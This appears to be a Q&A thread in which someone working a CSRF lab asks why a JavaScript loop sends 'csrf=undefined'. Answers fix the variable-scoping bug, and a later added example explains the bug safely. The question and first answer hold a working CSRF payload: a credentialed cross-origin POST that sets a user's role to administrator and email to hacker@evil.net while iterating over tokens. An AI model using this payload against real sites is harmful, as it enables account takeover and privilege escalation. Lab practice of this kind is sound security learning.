
JavaScript: Iterate through array in for loop?

I'm working on a CSRF lab and trying to iterate over 20+ tokens.

<script>
    var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
    var arrayLength = token.length;
    for (var i = 0; i < arrayLength; i++) {
        function submitRequest() {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://csrf.labs/function.php", true);
            xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.withCredentials = true;
            var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
                aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
        }
        submitRequest.call();
    };
</script>

I'm using +token[i]+ to insert the token into the csrf parameter, but when I look at the request in Burp it appears as "undefined":

POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0

username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=

What am I doing wrong here? I'm still new to JavaScript, so maybe +token[i]+ isn't the right approach?

You define i twice in the same scope; either define it with let or use another variable:

var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
    function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://csrf.labs/function.php", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
        var aBody = new Uint8Array(body.length);
        for (var j = 0; j < aBody.length; j++)
            aBody[j] = body.charCodeAt(j);
        xhr.send(new Blob([aBody]));
    }
    submitRequest.call();
};

When you create fn submitRequest(), a new scope is created that doesn't know about var token. So I think you need to pass token[i] to your fn when calling it, and prototype the fn accordingly.

function submitRequest(token){
}
submitRequest(token[i]);
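Added example, not code from the question or either answer: it reproduces the "csrf=undefined" symptom with plain functions and no network request, so the cause is visible, and places the accepted fix (a distinct inner counter, plus let) beside it. It also shows why the charCodeAt-into-Uint8Array loop in the original code is not a safe way to turn a string into request bytes. TOKENS is a constructed placeholder list and every function name below is chosen here.

```javascript
// Added example, not code from the original question or answers. It
// reproduces the "csrf=undefined" symptom with plain functions and no
// network request so the cause is visible. TOKENS is a constructed
// placeholder list; every function name below is chosen here.

const TOKENS = ["token-A", "token-B", "token-C"]; // constructed sample values

// Same shape as the question's loop. `var` is function-scoped, so the
// `var i` of the inner loop is hoisted to the top of build(): the read of
// tokens[i] on build()'s first line sees that local, still-undefined `i`,
// not the outer loop counter, and every body comes out as "csrf=undefined".
function collectBodiesBuggy(tokens) {
  var bodies = [];
  for (var i = 0; i < tokens.length; i++) {
    var build = function () {
      var body = "csrf=" + tokens[i] + "&submit="; // local i === undefined here
      var bytes = new Uint8Array(body.length);
      for (var i = 0; i < bytes.length; i++) {     // this declaration shadows the outer i
        bytes[i] = body.charCodeAt(i);
      }
      bodies.push(body);
    };
    build();
  }
  return bodies;
}

// The accepted fix: a distinct inner counter (j) so the closure reads the
// outer loop's i. `let` additionally gives each iteration its own binding,
// which matters if the callback is ever invoked asynchronously.
function collectBodiesFixed(tokens) {
  const bodies = [];
  for (let i = 0; i < tokens.length; i++) {
    const build = () => {
      const body = "csrf=" + encodeURIComponent(tokens[i]) + "&submit=";
      bodies.push(body);
    };
    build();
  }
  return bodies;
}

// The question's charCodeAt-into-Uint8Array loop only works for code points
// below 256; anything larger is silently truncated to its low byte.
function encodeLatin1Truncating(text) {
  const bytes = new Uint8Array(text.length);
  for (let j = 0; j < text.length; j++) bytes[j] = text.charCodeAt(j);
  return bytes;
}

// TextEncoder produces correct UTF-8 and is the idiomatic replacement.
function encodeUtf8(text) {
  return new TextEncoder().encode(text);
}

console.log(collectBodiesBuggy(TOKENS)); // three times "csrf=undefined&submit="
console.log(collectBodiesFixed(TOKENS)); // csrf=token-A..., csrf=token-B..., csrf=token-C...
console.log(encodeLatin1Truncating("\u20AC").length, encodeUtf8("\u20AC").length); // 1 3
```

Run it with node; the buggy collector returns "csrf=undefined&submit=" for every token even though the outer loop does run once per token, which is exactly what the Burp capture in the question shows.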
